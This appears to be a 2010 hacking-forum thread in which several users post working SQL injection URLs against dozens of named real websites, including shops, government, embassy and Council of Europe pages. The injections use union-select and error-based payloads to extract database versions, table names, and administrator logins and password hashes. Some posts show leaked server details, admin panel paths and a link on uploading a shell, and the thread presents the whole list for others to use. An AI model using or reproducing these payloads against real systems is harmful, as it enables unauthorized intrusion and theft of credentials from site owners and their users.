http://www.fssmo.ru/CompDetails.aspx?id=111 or 1 group by concat((select concat(name,0x3a,passwd) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1
Code:
http://www.checkersindustrial.com/product.php?id=25+and+row(1,2)in(select+count(*),c oncat((select+table_name+from+information_schema.t ables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+i nformation_schema.tables+x+group+by+a)
Code:
http://www.motorcyclebag.com/product.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11--
moodoone
22.10.2010, 22:21
Code:
http://ehrle.com.ua/products/products_cat2.php?p1=0&p2=-1+union+select+1,2,3,4,group_concat%28table_name%2 9,6,7+from+information_schema.tables--+
TIC 10.
http://www.anti-scam.org/cgi-bin/scamers-info/comments.cgi?view=-4389+union+select+1,concat_ws%280x3a,version%28%29 ,user%28%29%29,3,4,5,6+--+
4.1.22-lk-log:antiscam@localhost
http://www.boomtowndesign.com/portfolio-project.php?id=56 union select version(),2-- 1
http://www.solardesign.com/projects/project_display.php?id=1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- 1
http://www.meinhardtgroup.com/keypeople.php?id=-228 union select 1,unhex(hex(concat(user,0x3a,password))),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28 from mysql.user limit 0,1-- 1
http://www.dallaswebdeveloper.com/pages/portfolio.php?id=graphic' limit 0 /*!union*/ select 1,2,3,/*!table_name*/,5 from information_schema.`tables` limit 17,1-- 1
Real estate of Ukraine
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users--&cat=19
5.1.49 keystonecomua@localhost keystonekatalog portbld-freebsd8.0
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users--&cat=19
shops (Spain)
http://www.almonedavigo.com/tienda.php?id=-44+union+select+concat_ws(0x3a,version(),user(),da tabase())+--+&tit=Coleccionables%20en%20papel
http://www.motorrad.es/tiendas/tienda.php?id=-3+union+select+1,clave+from+motor_bbdd.usuarios+--+
http://www.recicleta.com/html/tienda.php?tipo=bicicletas&id=-12+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42+--+
http://www.kdekovito.com/tienda.php?id=-9+union+select+1,2,concat_ws(0x3a,Userusuario,pass Usuario),4,5,6+from+usuarios_panel+--+
http://www.naturabisse.es/en/tienda.php?id=-335+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),user(),database()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 %20,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54+--++--+
http://www.coleccionarsellos.com/tienda/tienda.php?id=-112+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9+--+
http://www.elbauldelplacer.com/tienda.php?mod=tienda_productos&id=-50+union+select+1,concat_ws(0x3a,nombre,password), 3,4,user()+from+usuarios+--+
http://www.motocross.es/tienda.php?id=-24+union+select+concat_ws(0x3a,nickname,password)+ from+usuarios+--+
http://www.artcorporal.es/web/tienda.php?id=1&id_subcategoria=-1+union+select+1,concat_ws(0x3a,User_login,user_pa ss),3,4,5,6,7,8,9,10+from+wp_users+--+
http://www.hectorgomis.com/tienda.php?id=8&pag=9&sub=-13+union+select+1,pass,3+from+usuarios+--+
http://lacacharreriadekuentin.com/tienda.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase())+--+
http://www.1000bebes.com/tienda.php?mod=producto&iu=-1444+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11,12,13,14,15,16,1 7+--+
http://www.ccriberadelxuquer.com/tienda.php?id=-93+union+select+1,2,concat_ws(0x3a,nombre,passwd), 4,5,6,7,8,9,10,11+from+manilva.usuarios+--+
http://www.foronum.com/links-ficha-tienda.php?id=-61+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13+--+
http://www.estudiocanfranc.com/carritocompra/tienda.php?val=1&id=-56++union+select+1,2,3,4444,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19+--+
http://www.powderchile.cl/tienda.php?funcion=ver_categoria&id=-8+union+select+concat_ws(0x3a,login,pass)+from+adm inistrador+--+
http://cyberpunks.es/spar/tienda.php?id=-10+union+select+1,2,concat_ws(0x3a,user,pass),4,5, 6,7,8,9,10,11,12,13+from+ad1690.usuarios+--+
LDPR Novosibirsk
http://www.ldpr-nsk.ru/?tpage=snews&year=2010&mounth=10&day=-19+and+1=2+union+select+1,2,3,4,concat(@@version,0 x20,user(),0x20,database(),0x20,@@version_compile_ os)+--
5.1.50-log ldpr-nsk@localhost ldprnsk_ldpr redhat-linux-gnu
http://citidesk.ru/browse_classifieds.php?classifiedcat_id=160+or+(se lect+count(*)from(select+1+union+select+2+union+se lect+3)x+group+by+concat(mid((select+TABLE_NAME+fr om+information_schema.tables+where(table_schema!=0 x696E666F726D6174696F6E5F736368656D61)limit+0,1),1 ,64),floor(rand(0)*2)))
TIC: 20
4k
PHP:
http://dialogkyiv.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+whe %20%20re+user_website+LIKE+0x2575626225+LIMIT+0,1--+
http://www.ntc.com.tr/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*), concat((select%20(select%20concat(0x7e,0x27,unhex( hex(database())),0x27,0x7e))%20from%20information_ schema.tables%20limit%200,1),floor(rand(0)*2))x%20 from%20information_schema.tables%20group%20by%20x) a)%20and%201=1
http://www.biyikoglutesisleri.com/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*), concat((select%20(select%20concat(0x7e,0x27,unhex( hex(database())),0x27,0x7e))%20from%20information_ schema.tables%20limit%200,1),floor(rand(0)*2))x%20 from%20information_schema.tables%20group%20by%20x) a)%20and%201=1
http://www.brassjunkies.com/auction_details.php?auction_id=100131+or+1+group+b y+concat(version(),floor(rand(0)*2))having+min(0)+ or+1--+
http://www.yeu-international.org/nm/3/article.php?id=40+union+select+1,2,3,4,5,6,7,8,9--
http://www.warrandale.com/portfolio-details.php?id=-43 union select 1,2,concat(user,0x3a,password),4,5,6,7 from administrators-- 1&c=prtf
DezMond™
25.10.2010, 21:44
A mini collection)
ricklemay.com TIC — 10 PR — 3
Code:
http://www.ricklemay.com/index.php?id=10&uid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+from+users+--+
valeri.ru
Code:
http://www.valeri.ru/index.php?action=types&id=8&uid=-383+union+select+1,password,3,4,5,6,7,8,9,10,11+fr om+users+--+
www.uidjournal.com TIC — 10 PR — 4
Code:
http://www.uidjournal.com/index.php?page=solutionsguide&provider=-4'+union+select+1,2,concat_ws(0x3a3a,email,passwor d),4,5,6,7,8,9,10,11,12,13,14+from+users+--+
marquardt-switches.com TIC — 10 PR — 3
Code:
http://www.marquardt-switches.com/232.html?&L=1&tx_productkatalog_pi1%5Bmode%5D=detail2&tx_productkatalog_pi1%5Bmodifier%5D=0&tx_productkatalog_pi1%5Bvalue%5D=1810&tx_productkatalog_pi1%5Bpointer%5D=2&cHash=e51d8d4c7b&home=toggle-switches.html&prodID=-6044+union+select+1,2,3,4,5,6+--+
asatpo.com
Code:
http://www.asatpo.com/normativa/ver_normativa.php?n=-6'+union+select+1,group_concat(table_name),3+from+ information_schema.tables+--+
opp.ca TIC — 10 PR — 7
Code:
http://www.opp.ca/ecms/index.php?id=405&nid=61+union+select+1,2,3,4,password,6+from+users+--+
hessenweb.de TIC — 10 PR — 4
Code:
http://www.hessenweb.de/index.php?id=veranstaltungen&no_cache=1&tx_jwcalendar_pi1[uid]=698&tx_jwcalendar_pi1[time]=1264978800+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65+--+&tx_jwcalendar_pi1[view]=LIST&cHash=4b5ebde116
lindy-hop.ch TIC — 10 PR — 3
Code:
http://lindy-hop.ch/cms/index.php?id=10&tx_jwcalendar_pi1%5Bview%5D=LIST&tx_jwcalendar_pi1%5Buid%5D=11&tx_jwcalendar_pi1%5Btime%5D=-1272664800+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65+from+be_users+--+&cHash=14d7bf51d0
bikezona.tv TIC — 10 PR — 4
Code:
http://www.bikezona.tv/videomaton/index.php?idvideo=-407'+union+select+1,2,concat_Ws(0x3a3a,login,passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+bztv _usuarios+--+
mapeco.fr
Code:
http://www.mapeco.fr/index.php?host=ccih&l=1&id=-247600596+union+select+111+--+&cmd=zoom&op=locate&module=epci&etape=3&mode=&val=&niv=-1&XMIN=423000&YMIN=2489500&XMAX=489000&YMAX=2529500&XMINEXTENT=423000&YMINEXTENT=2489500&XMAXEXTENT=489000&YMAXEXTENT=2529500&info=5&cible=&cx=206&cy=236
corematerials.3acomposites.com
Code:
http://www.corematerials.3acomposites.com/316.html?&no_cache=1&L=1&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cou&tx_nicosdirectory_pi1%5Bvalue%5D=-23_1+UNion+Select+user(),222,database(),444+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=00cdf0441c
malighting.com TIC — 20 PR — 4
Code:
http://www.malighting.com/control.html?&tx_lightpowerpdb_pi1[parent_gruppe]=233'&tx_lightpowerpdb_pi1[produkt_id]=-2649+union+select+1,2,concat_Ws(0x3a3a,admin_login ,admin_password),4,5,6,7,8,9+from+pdb_admin+--+&cHash=80a870b15e'
corporate.lanxess.com TIC — 40 PR — 6
Code:
http://corporate.lanxess.com/index.php?id=289&L=0&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-16717+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,LOAD_FILE(0x 2F6574632F706173737764),78+--+&tx_editfiltersystem_pi1%5Bnews_category%5D=34'&tx_editfiltersystem_pi1%5Bnews_date_start%5D=9.200 9'&tx_editfiltersystem_pi1%5Bnews_date_end%5D=9.2010'
fs-eprocure.com
Code:
http://www.fs-eprocure.com/index.php?id=131&no_cache=1&L=1%2F&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1054+UNioN+sELecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+--+&cHash=24d6156e85f25dc6d07cf6d6fcbc2052
ferrostaalpower.com
Code:
http://ferrostaalpower.com/index.php?id=131&no_cache=1&L=5&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1259+UnioN+SelecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+from+information_schema .tables+--+&cHash=9170bd1cf7
couplemeets.de
Code:
http://www.couplemeets.de/dev/index.php?id=26&tx_nicosdirectory_pi1%5Bmode%5D=detail&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,concat_ws(0x3a3a,username,password,admin), 19,20,21+from+be_users+limit+1,1+--+&cHash=81f10fc595
foodtrendexperience.com
Code:
http://www.foodtrendexperience.com/fte/index.php?idVideo=-15+union+select+1,2,user(),4,5,6,7,8,9,10,11,12+--+
darinfo.com.ua TIC - 10 PR - 1
Code:
http://www.darinfo.com.ua/inter/index.php?action=base&id=5&location=1&uid=-728'+union+select+1,2,3,4,5,6,7,8,9,version()+--+
gruenberg.de TIC - 10 PR - 4
Code:
http://www.gruenberg.de/index.php?sp=de&nr=-17+union+select+1,user(),3,4,5,6+from+information_ schema.tables+--+&uid=d_bilder/&id=showbild&alt=%26id%3Dtour%26uid%3D%26uuid%3D
allhometeens.com
Code:
http://www.allhometeens.com/?page=inner&id_article=-43'+union+select+1,user(),3,4,5,6,7,8+--+
foruminst.sk TIC - 10 PR - 5
Code:
http://www.foruminst.sk/index.php?p=publications&t=a&xp=&publ_id=408'&link=publ/egyeb/mezeiang/urbandevelopment,,&MId=&Lev=&Ind=-1+union+select+1,2,concat_ws(0x3a3a,email,usname,u spasswd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+fr om+users+--+&P=index,en,
stfw.ch TIC - 10 PR - 5
Code:
http://www.stfw.ch/no_cache/stfw/portrait/schulleitung/?tx_spdirectory_pi1%5Bmode%5D=detail&tx_spdirectory_pi1%5Bvalue%5D=-90+/**/+UNioN+/**/+/**/+SelECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,user(),42,43,44+--+
soziologie.de TIC - 10 PR - 7
Code:
http://www.soziologie.de/index.php?id=4&tx_jwcalendar_pi1%5Btime%5D=-3600+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,group_concat(table_name),21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65+from+information_schema. tables+--+&tx_jwcalendar_pi1%5Buid%5D=81&tx_jwcalendar_pi1%5Bview%5D=MONTH&cHash=ba2015f647
ricerca.polimi.it TIC - 10 PR - 5
Code:
http://www.ricerca.polimi.it/index.php?id=4425&tx_wfqbe_pi1%5Bid%5D=25560+union+select+1,2,user() ,4,5,6,7,8,9,10+from+information_schema.tables+--+
blv-sport.de TIC - 10 PR - 4
Code:
http://blv-sport.de/index.php?id=232&tx_wfqbe_pi1%5Buid%5D=-442+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,1 3+from+laufsport+--+
architector.dp.ua TIC - 40 PR - 2
Code:
http://www.architector.dp.ua/?catalog&dep=study&arts=6&id=-36'+union+select+1,2,3,concat_ws(0x3a3a,login,pass w),5,6,7,8,9,10,11,12,13+from+admin_users+--+
photographysalley-gallery.com TIC - 10 PR - 3
Code:
http://photographysalley-gallery.com/index.php?com=evenement&idevent=-1'+union+select+1,2,3,4,5,6,7,8+from+information_s chema.tables+--+
carronlugon.com TIC - 10 PR - 2
Code:
http://www.carronlugon.com/index.php?mod=galerie&idevent=-15+union+select+1,2,concat_Ws(0x3a3a,login,psw,nom ,privilege),4+from+utilisateur+--+
aflakshop.com
Code:
http://aflakshop.com/cat.php?id=-1'+union+select+1,2,3,4,table_name,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+i nformation_schema.tables+--+&page=50&AdsID=1586&ads_type=&percent=
readingmatrix.com TIC - 10 PR - 5
Code:
http://www.readingmatrix.com/ecalendar/index.php?action=details&event_id=-80+union+select+1,2,3,4,5,user(),7,8,9,10,11,12+--+
robot-ch.org TIC - 10 PR - 6
Code:
http://www.robot-ch.org/site/modules/piCal/index.php?com_mode=nest&com_order=0&event_id=-161'+union+select+1,2,3,concat_ws(0x3a3a,login,pas s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+users+limit+1 ,1+--+
media-watch.tv TIC - 10 PR - 3
Code:
http://media-watch.tv/e_event_form.php?event_id=85+union+select+1,2,3,4, concat_Ws(0x3a3a,user_name,password),6,7,8,9,10,11 +from+user+limit+1,1+--+&ref_page=/index.php
bistum-dresden-meissen.de TIC - 10 PR - 5
Code:
http://www.bistum-dresden-meissen.de/front_content.php?idcat=2110'&idart=11842'&id=-457+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25+--+&st=1
babochka-style.ru
Code:
http://babochka-style.ru/index.php?&act=shop&action=showitem&id=-31'+union+select+1,2,3,concat_ws(0x3a3a,login,pass word),5,6+from+users+--+
drift.s-w-s.ru
Code:
http://drift.s-w-s.ru/index.php?&act=shop&action=showitem&id=-8'+union+select+1,2,3,concat_ws(0x3a3a,login,passw ord),5,6,7,8,9,10,11+from+users+limit+1,1+--+
firestreamvault.com TIC - 10 PR - 1
Code:
http://firestreamvault.com/main/index.php?go=front/index.php&go=showitem&cat_id=580&narrow=&item_id=-1434+union+select+1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+--+&user_id=
P.S. No reposts!
so, something like that
HTML:
http://specavia.com.ua/l/ru/pages/120&mod=news&news=-1+union+select+1,concat(name,0x7c,pass,0x7c,id,0x3 c62723e),3,4+from+specavia.users+--+
HTML:
http://www.slavrada.gov.ua/?view=votes&voteID=-1+union+select+1,2,3,4,5,6,7,username,user_passwor d,user_form_salt,11,12,13,14,15+from+phpbb3_users+--+
http://el-ero.ru/aboutthisgood.php?ID=1603+or+1+group+by+concat((se lect+version()),rand(0)|0)+having+min(0)
http://www.serovmet.ru/ru/press/news/index.php?id15=-9373+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,version(),@@version_compile_os,user(),database()) ,10,11,12,13,14,15,16,17,18+--+
http://autoperspect.ru/index.php?all_news&details=-156+union+select+1,2,concat_ws(0x3a3a,version(),@@ version_compile_os,user(),database()),4,5,6,7,8,9, 10,11+--+
http://iranembassy.ru/?section=news&page=article&view=article&id=-479+union+select+1,2,3,concat_ws(0x3a3a,version(), @@version_compile_os,user(),database()),5,6,7,8,9, 10,11,12,13,14+--+
http://superrest.ru/town_info.php?id=-132+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14+--+
http://www.ucentrec.ru/seminars/seminar/?info_id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,concat_ws(0x3a3a,@@version_compile_os,user(),dat abase())+--+
bloodAngel
27.10.2010, 01:53
http://bitpartner.com.ua/office/register.php?sid=2+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3,version(),user(),database()),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35--
[Feldmarschall]
27.10.2010, 04:44
EU
Council of Europe
_________________________________________________
http://www.coe.int/t/congress/sessions/19/NewsSearch/default_en.asp?p=nwz&id=6586+OR(1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES for xml raw))&lmLangue=1
MSSQL version:
Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)
TIC - 2200
PR - 9
dunravenhouse.com
PR - 2
Code:
https://www.dunravenhouse.com/cart/index.php?cat_id=-86+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
staceyspans.com
PR - 2
Code:
http://www.staceyspans.com/cart/index.php?cat_id=-5+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
cellgroup.com
PR - 3
Code:
http://www.cellgroup.com/estore/index.php?cat_id=-11+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
marketitdirect.net
PR - 1
Code:
http://www.marketitdirect.net/shop/index.php?cat_id=-3+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
rockpaidat.com
PR - 3
Code:
http://www.rockpaidat.com/shop/index.php?cat_id=-23+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
marshwoodgardens.co.nz
PR - 4
Code:
http://www.marshwoodgardens.co.nz/index.php?cat_id=-1+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
vandongens.com
PR - 2
Code:
http://www.vandongens.com/catalogue/index.php?cat_id=-244+union+select+concat_ws(0x3,version(),user(),da tabase()),2,3,4,5,6,7,8--
-PRIVAT-
27.10.2010, 14:41
http://www.trenco.biz/news/?news_id=14%20union%20select%201,2,3,4,5,6,7,8,9,1 0,11--
http://www.avmaniacs.com/review.php?id=-1472/**/union/**/select/**/1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8--
http://www.freediving.biz/news/index.php?news_id=19%20union%20select%201,2,3,4,5, 6--
http://autosfera.biz/news.php?news_id=91/**/union/**/select/**/1,2,3,4,5--
http://www.inbar.int/show.asp?NewsID=373 or 1=@@version--
+ Addition to FeldMarshall's post
Fishing lodge "Udacha"
Code:
http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@ver sion,user(),database(),@@version_compile_os),5+--
4.1.25-log udachavo@fe15.hc.ru wwwudachavolgaru portbld-freebsd6.2
Code:
http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,email,pswd),5+from+administrator--&PHPSESSID=d788d79d683a509f9a86cf2284e5febc
http://www.udacha-volga.ru/admin.php
the passwords don't work
Strilo4ka
27.10.2010, 23:30
PR 7, TIC 40
http://www.lib.udel.edu/ej/index.php?S=%' and 0 union select 1,unhex(hex(version())),3,4,5,6,7 from mysql.user/* &I=26
veterans-gaming.com
PR - 1
Code:
http://www.veterans-gaming.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
globalassaultunit.net
PR - 1
Code:
http://globalassaultunit.net/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
www.clankillas.net
PR - 3
Code:
http://www.clankillas.net/portal/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
totalgamersnetwork.com
PR - 1
Code:
http://www.totalgamersnetwork.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
hu.cring.eu
PR - 1
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
Roughly how we pull out the admin's hash and nickname:
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3a,user_name,us er_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_ user--
Admin panel:
Code:
http://hu.cring.eu/e107_admin/admin.php
how to upload a shell (https://antichat.live/showpost.php/p/2119209/postcount/63/)
http://www.shopland-n.com/town_info.php?id=-149+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4,5,6,7+--+
http://www.appliedartsmag.com/opinions.php?id=-37+union+select+1,concat_ws(0x3a3a,version(),@@ver sion_compile_os,user(),database()),3,4,5
http://www.creativeniche.ca/candidate_jobs_detail.cfm?jobid=-1304+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,version(),user(),database()),10,11
http://www.thunderbirdmarine.com/email-friend.php?ID=-2987+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,ID,username,password),11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 ,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,10 2,103,104,105,106,107,108,109,110+from+Users+limit +0,1
Online store.
PHP:
http://www.historicalcenter.ru/etc.php?id=6&idg=420+union+select+1,concat_WS(0x3a,user(),versi on(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22/*
PHP:
histcenter@localhost:5.0.45:histcenter
A salon of beauty and splendor =)
PHP:
http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_ws(0x3 a,user(),version(),database()),5,6,7,8,9,10/*
PHP:
admin_vashstile@localhost:5.0.22-log:admin_vashstile
Digging further, we get
PHP:
http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_WS(0x3 a,id,username,uncrypt_pass,email,status),5,6,7,8,9 ,10+from+users+limit+0,1/*
the admin panel is here
PHP:
http://www.vashstile.ru/admin/
though I never did find the admin account
http://www.elves.ru/image/1_2.gif
http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os),6,7, 8,9,10,11,12,13,14+--
4.0.26-log Uwww64S@localhost udb64 portbld-freebsd4.10
http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,logi n,pass,email),6,7,8,9,10,11,12,13,14+from+client+l imit+1+offset+495--
http://www.magelan.su/news.php?id=1075'+and+1=0+union+select+1,2,group_c oncat(table_name),4,5,6+from+information_schema.ta bles+Where+table_schema='magelan_base'+--+
TIC: 230
http://www.degreeart.com/newsite/viewpress.php?id=104 union select 1,version(),3,4,5,6-- 1
http://www.farcountrypress.com/details.php?id=214' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77-- 1
http://eurocatwalk.com/photo_details.php?uid=-428 union select 1,2,3,4,5,version(),7,8,9,10-- 1
http://www.gamedogped.com/details.php?id=48212 or 1 group by concat((select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.gamepile.com/details.php?id=-21 /*!Union*/ select 1,2,table_name,4,5,6,7,8 from information_schema.`tables`-- 1
tidewaterintergroup.org
PR - 5
Code:
http://www.tidewaterintergroup.org/e107_plugins/aa_meetings/directory.php?Day_qf=d0s&City_qf=%2522+union+select+null,null,null,concat_w s(0x3a,user_loginname,user_password),null,null,nul l,null,null,null,null,null,null,null,null,null+fro m+e107_user+where+user_id=1--+
Code:
http://www.tidewaterintergroup.org/e107_admin/admin.php
wildcatsclan.net
PR - 1
Code:
http://www.wildcatsclan.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%20 1,2,3,4,5,concat_ws(0x3a,user_loginname,user_passw ord),7,8,9,10%20from%20e107_user%20where%20user_ad min=1%20limit%200,1
Code:
http://www.wildcatsclan.net/e107_admin/admin.php
vancouverphoto.net
PR - 1
Code:
http://www.vancouverphoto.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%20 1,2,3,4,5,concat_ws(0x3a,user_loginname,user_passw ord),7,8,9,10%20from%20e107_user%20where%20user_ad min=1%20limit%200,1
Code:
http://www.vancouverphoto.net/e107_admin/admin.php
-PRIVAT-
28.10.2010, 20:24
http://www.ramzes.biz/article.php?id=-69%20union%20select%201,concat_ws(0x3a,user_name,u ser_password),3,4,5,6,7,8%20from%20cpg11d_users--
http://businesstuning.biz/article.php?id=1/**/union/**/select/**/1,2,3,4
http://www.ethr.biz/article.php?id=-58%20union%20select%201,concat_ws(0x3a,id,username ,password),3,4,5,6,7%20from%20member--
http://www.clicknews.biz/article.php?id=115400%20or%201%20group%20by%20conc at(version(),floor(rand(0)*2))having%20min(0)%20or %201--%201
http://www.michaelandersen.biz/news/nw/article.php?id=-159%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3--
http://whisperstreet.biz/news.php?id=13'%20or%201%20group%20by%20concat(ver sion(),floor(rand(0)*2))having%20min(0)%20or%201--%201
http://www.marinaonthebay.biz/news.php?id=-25%20union%20select%201,2,3,concat_ws(0x3a,id,logi n,password),5,6,7,8,9,10,11%20from%20administrator s--
http://turkkulturvakfi.biz/pages.php?ID=-31%20union%20select%201--
http://www.ozkulkaro.com.tr/dinamik/urun_grubu.php?urun_id=5+and+1=0+union+select+1,2, 3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,usernam e,password),1),1),6,7,8,9+from+admin--&menu=61
http://www.academictutorials.com/quiz.asp?id=66+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14+from+msysaccessobjects
